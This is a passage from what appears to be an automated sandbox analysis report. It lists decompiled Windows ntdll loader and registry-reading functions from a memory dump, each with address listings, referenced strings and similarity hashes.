										E01885510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x18f5780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E0181849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E01818999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E01818999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x18f5c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x18f5c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E01822280(_t92, 0x18f86cc);
															_t94 = E018D9DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E018361A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x18f5c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E01818A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x18f5c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x18f5c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E0184F380(_t136, 0x17e1184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E01822280(_t108, 0x18f86cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E018361A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E018D9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E0181FFB0(_t118, _t156, 0x18f86cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E01849A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}

0x01818799
0x0181879d
0x018187a1
0x018187a3
0x018187a8
0x018187c3
0x018187c3
0x018187c8
0x018187d1
0x018187d4
0x018187d8
0x018187e5
0x018187ec
0x01869bfe
0x01869c00
0x01869c02
0x01869c08
0x01869c0d
0x01869c0f
0x01869c14
0x01869c2d
0x01869c32
0x01869c37
0x01869c3a
0x01869c3c
0x01869c42
0x01869c42
0x01869c3c
0x01869c02
0x018187da
0x018187df
0x018187e3
0x00000000
0x00000000
0x018187e3
0x018187f2
0x00000000
0x018187fb
0x018187fd
0x018187fe
0x0181880e
0x0181880f
0x01818810
0x01818814
0x0181881a
0x0181881c
0x0181881f
0x01818821
0x01818822
0x01818824
0x01818826
0x0181882c
0x0181882e
0x01869c48
0x01869c48
0x01818834
0x01818834
0x01818837
0x00000000
0x00000000
0x01818837
0x0181882e
0x0181883d
0x01818840
0x01818843
0x01818846
0x01818849
0x0181884c
0x0181884e
0x01818850
0x01818852
0x01818854
0x01818857
0x018188b4
0x018188b6
0x018188b6
0x01818859
0x01818859
0x01818859
0x01818861
0x01818866
0x0181886a
0x0181893d
0x01818941
0x00000000
0x01818947
0x01818947
0x0181894a
0x0181894c
0x00000000
0x01818952
0x01818955
0x0181895a
0x0181895d
0x0181895d
0x0181895f
0x01818961
0x01818961
0x01818968
0x00000000
0x00000000
0x0181896a
0x0181896b
0x0181896e
0x00000000
0x01818970
0x01818970
0x01818970
0x01818970
0x01818972
0x01818972
0x01818974
0x00000000
0x0181897a
0x0181897a
0x0181897d
0x00000000
0x01818983
0x01869c65
0x01869c6d
0x01869c72
0x01869c75
0x01869c75
0x01869c82
0x01869c86
0x01869c87
0x01869c88
0x01869c89
0x01869c8c
0x01869c90
0x01869c95
0x01869c97
0x01869ca0
0x01869ca3
0x01869ca9
0x01869ca9
0x00000000
0x01869ca9
0x01869ca3
0x00000000
0x01869c97
0x0181897d
0x00000000
0x01818974
0x01818988
0x01818992
0x01818996
0x00000000
0x01818996
0x0181894c
0x00000000
0x01818870
0x0181887b
0x0181887d
0x0181887f
0x01818881
0x01818884
0x01818884
0x01818886
0x01818889
0x0181888c
0x0181888e
0x01818891
0x01818891
0x01818898
0x00000000
0x00000000
0x0181889a
0x0181889b
0x0181889e
0x00000000
0x00000000
0x018188a0
0x018188a8
0x018188b0
0x018188b2
0x018188d3
0x018188d5
0x00000000
0x018188d7
0x018188db
0x018188dc
0x018188e0
0x018188e8
0x018188ee
0x018188f0
0x018188f3
0x018188fc
0x01818901
0x01818906
0x0181890c
0x0181890c
0x0181890f
0x01818916
0x01818917
0x01818918
0x01818919
0x0181891a
0x0181891f
0x01818921
0x01869c52
0x01869c55
0x01869c5b
0x01869cac
0x01869cc0
0x01869cc0
0x01869c55
0x01818927
0x01818927
0x0181892f
0x01818933
0x00000000
0x018188f5
0x018188f5
0x00000000
0x018188f7
0x018188f7
0x018188fa
0x00000000
0x00000000
0x00000000
0x00000000
0x018188fa
0x018188f5
0x018188f3
0x00000000
0x018188d5
0x00000000
0x018188b2
0x018188c9
0x00000000
0x018188c9
0x0181887f
0x0181886a
0x01818857
0x01818852
0x018188bf
0x018188bf
0x018187aa
0x018187ad
0x018187ae
0x018187b4
0x018187b5
0x018187b6
0x018187b8
0x018187bd
0x018187c1
0x018187f4
0x018187fa
0x00000000
0x00000000
0x00000000
0x018187c1
0x00000000

Strings

LdrpDoPostSnapWork, xrefs: 01869C1E
LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01869C18
minkernel\ntdll\ldrsnap.c, xrefs: 01869C28

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
API String ID: 2994545307-1948996284
Opcode ID: 93e33a19597bad93227b16fb53491ec9f2e76c79057e2bd60e094514c4659733
Instruction ID: ca680bfc33ae5b72c73848b4a1cf78d01ed7a06bb3f9e8c178d2d65e32400de6
Opcode Fuzzy Hash: 93e33a19597bad93227b16fb53491ec9f2e76c79057e2bd60e094514c4659733
Instruction Fuzzy Hash: 4791F472A0021A9FDB18DF5DD4C2ABAB7B9FF46314B144169DD05EB249EB30EB01CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01817E41, Relevance: 3.9, Strings: 3, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E01817E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E0181CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E0180C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x18f5780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E01885510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x18f5780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E01827D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E01827D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E01887016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E01827D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E01827D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E01887016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E0183A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E0180B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}

0x01817e4c
0x01817e50
0x01817e55
0x01817e58
0x01817e5d
0x01817e71
0x01817f33
0x01817e77
0x01817e77
0x01817e79
0x01817e79
0x01817e7e
0x01817f45
0x01869848
0x00000000
0x01869848
0x01817f4e
0x01817f53
0x01817f5a
0x00000000
0x00000000
0x0186985a
0x01869862
0x01869866
0x00000000
0x0186986c
0x00000000
0x0186986c
0x01817e84
0x01817e84
0x01817e8d
0x01869871
0x01817eb8
0x01817ec0
0x01817ec0
0x01817e9a
0x0186987e
0x00000000
0x00000000
0x01869884
0x0186988b
0x018698a7
0x018698ac
0x018698b1
0x018698b6
0x018698b8
0x018698b8
0x018698b9
0x00000000
0x018698b9
0x01817ea0
0x01817ea7
0x00000000
0x00000000
0x01817eac
0x01817eb1
0x01817ec6
0x01817ed0
0x018698cc
0x01817ed6
0x01817ed6
0x01817ed6
0x01817ede
0x01817ee3
0x018698e3
0x018698f0
0x01869902
0x018698f2
0x018698fb
0x018698fb
0x01869907
0x0186991d
0x0186991d
0x01869907
0x018698e3
0x01817ef0
0x01817f14
0x01817f14
0x01817f1e
0x01869946
0x01817f24
0x01817f24
0x01817f24
0x01817f2c
0x0186996a
0x01869975
0x01869975
0x0186997e
0x01869993
0x01869993
0x0186997e
0x00000000
0x01817ef2
0x01817efc
0x01817f0a
0x01817f0e
0x01869933
0x00000000
0x01869933
0x00000000
0x01817f0e
0x00000000
0x00000000
0x00000000
0x01817eb1

Strings

minkernel\ntdll\ldrmap.c, xrefs: 018698A2
LdrpCompleteMapModule, xrefs: 01869898
Could not validate the crypto signature for DLL %wZ, xrefs: 01869891

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: 2cd288b372b546a85ca6f36cee242731a1d4b0d7753f64b3be2ef329df0009af
Instruction ID: 825a2ccfbe7cb838b9164a6389eef5c274575a7cd90cad4bbf676cd8925d38f7
Opcode Fuzzy Hash: 2cd288b372b546a85ca6f36cee242731a1d4b0d7753f64b3be2ef329df0009af
Instruction Fuzzy Hash: 2051D032A007499FE722CB6CC944B2A7BE8AB05B18F140599EA51DB7D5D730EB00CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0180E620, Relevance: 3.9, Strings: 3, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0180E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E0180F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E018495D0();
						}
						if(_t78 != 0) {
							L018277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E0184FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E0184BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E01849600();
					if(_t97 < 0) {
						goto L6;
					}
					E0184BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L0180F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E0184BB40(_t83, _t102 + 0x24, _t78);
								if(L018143C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E0184BB40(_t84, _t102 + 0x24, _t94);
									if(L018143C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}

0x0180e620
0x0180e628
0x0180e62f
0x0180e631
0x0180e635
0x0180e637
0x0180e63e
0x01865503
0x01865503
0x0180e64c
0x0180e64c
0x0180e651
0x00000000
0x00000000
0x0180e661
0x0180e665
0x0186542a
0x0180e715
0x0180e71a
0x0180e71c
0x0180e720
0x0180e720
0x0180e727
0x0180e736
0x0180e736
0x0180e743
0x0180e743
0x0180e673
0x0180e678
0x0180e67d
0x0180e682
0x0180e685
0x0180e692
0x0180e69b
0x0180e6a3
0x0180e6ad
0x0180e6b1
0x0180e6b2
0x0180e6bb
0x0180e6bf
0x0180e6c0
0x0180e6c8
0x0180e6cc
0x0180e6d5
0x0180e6d9
0x00000000
0x00000000
0x0180e6e5
0x0180e6ea
0x0180e6f9
0x0180e70b
0x0180e70f
0x01865439
0x0186545e
0x0186545e
0x00000000
0x0186545e
0x0186543b
0x0186543e
0x01865440
0x01865445
0x01865472
0x01865475
0x0186548d
0x01865493
0x018654a9
0x00000000
0x00000000
0x018654ab
0x018654b4
0x018654bc
0x018654c8
0x018654de
0x018654fb
0x018654e0
0x018654e6
0x018654eb
0x018654eb
0x018654de
0x00000000
0x018654bc
0x01865477
0x0186547a
0x01865480
0x01865483
0x01865486
0x0186548b
0x00000000
0x00000000
0x00000000
0x0186548b
0x00000000
0x00000000
0x00000000
0x00000000
0x01865447
0x01865447
0x01865447
0x01865447
0x0186544e
0x00000000
0x00000000
0x01865450
0x01865452
0x01865455
0x0186545a
0x00000000
0x00000000
0x00000000
0x0186545c
0x0186546a
0x0186546d
0x0186546f
0x00000000
0x0186546f
0x0180e70f

Strings

@, xrefs: 0180E6C0
InstallLanguageFallback, xrefs: 0180E6DB
\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0180E68C

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: 7f6dca0c8099845e5e0f8c7f301919c82b12b3d92a7be57a4ffb7381cfe9c8e2
Instruction ID: 1c06c9988d96de3e1f9e6e756e75fcb5c2f49eab1bb96d7b8ff8fb3560705ec0
Opcode Fuzzy Hash: 7f6dca0c8099845e5e0f8c7f301919c82b12b3d92a7be57a4ffb7381cfe9c8e2
Instruction Fuzzy Hash: A55192B250434A9BD711DF28C884A6BB7ECAF88754F05096EFA85D7240EB34DB04C792

Uniqueness

Uniqueness Score: -1.00%

Function 018CE539, Relevance: 2.8, Strings: 2, Instructions: 261
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E018CE539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E018CBBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E018CBCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E018CAFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E01849730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E018CA80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E018CA854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E01849730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E018CA80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E018CA854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E01822280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E0181B090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E0181FFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E01827D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E018BFEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}

0x018ce547
0x018ce549
0x018ce54f
0x018ce553
0x018ce557
0x018ce55a
0x018ce55c
0x018ce55f
0x018ce561
0x018ce567
0x018ce56b
0x018ce7e2
0x00000000
0x018ce571
0x018ce575
0x018ce577
0x018ce57b
0x018ce57c
0x018ce57d
0x018ce57e
0x018ce57f
0x018ce588
0x018ce58f
0x018ce591
0x018ce592
0x018ce592
0x018ce596
0x018ce59e
0x018ce5a0
0x018ce5a6
0x018ce61d
0x018ce61d
0x018ce621
0x018ce623
0x018ce630
0x018ce630
0x018ce7e6
0x018ce7eb
0x018ce7ed
0x018ce7f4
0x018ce7fa
0x018ce7ff
0x018ce7ff
0x018ce80a
0x018ce812
0x018ce812
0x018ce5ab
0x018ce5b4
0x018ce5b9
0x018ce5be
0x018ce5c0
0x018ce5c2
0x018ce5c8
0x018ce5c9
0x018ce5cb
0x018ce5cc
0x018ce5d5
0x018ce5e4
0x018ce5f1
0x018ce5f8
0x018ce5f8
0x018ce5d5
0x018ce602
0x018ce616
0x018ce63d
0x018ce644
0x018ce64d
0x018ce652
0x018ce657
0x018ce659
0x018ce65b
0x018ce661
0x018ce662
0x018ce664
0x018ce665
0x018ce66e
0x018ce67d
0x018ce68a
0x018ce691
0x018ce691
0x018ce66e
0x018ce6b0
0x00000000
0x018ce6b6
0x018ce6bd
0x018ce6c7
0x018ce6d7
0x018ce6d9
0x018ce6db
0x018ce6de
0x018ce6e3
0x018ce6f3
0x018ce6fc
0x018ce700
0x018ce700
0x018ce704
0x018ce70a
0x018ce70a
0x018ce713
0x018ce716
0x018ce719
0x018ce720
0x018ce761
0x018ce76b
0x018ce774
0x018ce77a
0x018ce77a
0x018ce78a
0x018ce791
0x018ce799
0x018ce79b
0x018ce79f
0x018ce7aa
0x018ce7c0
0x018ce7ac
0x018ce7b2
0x018ce7b9
0x018ce7b9
0x018ce7c7
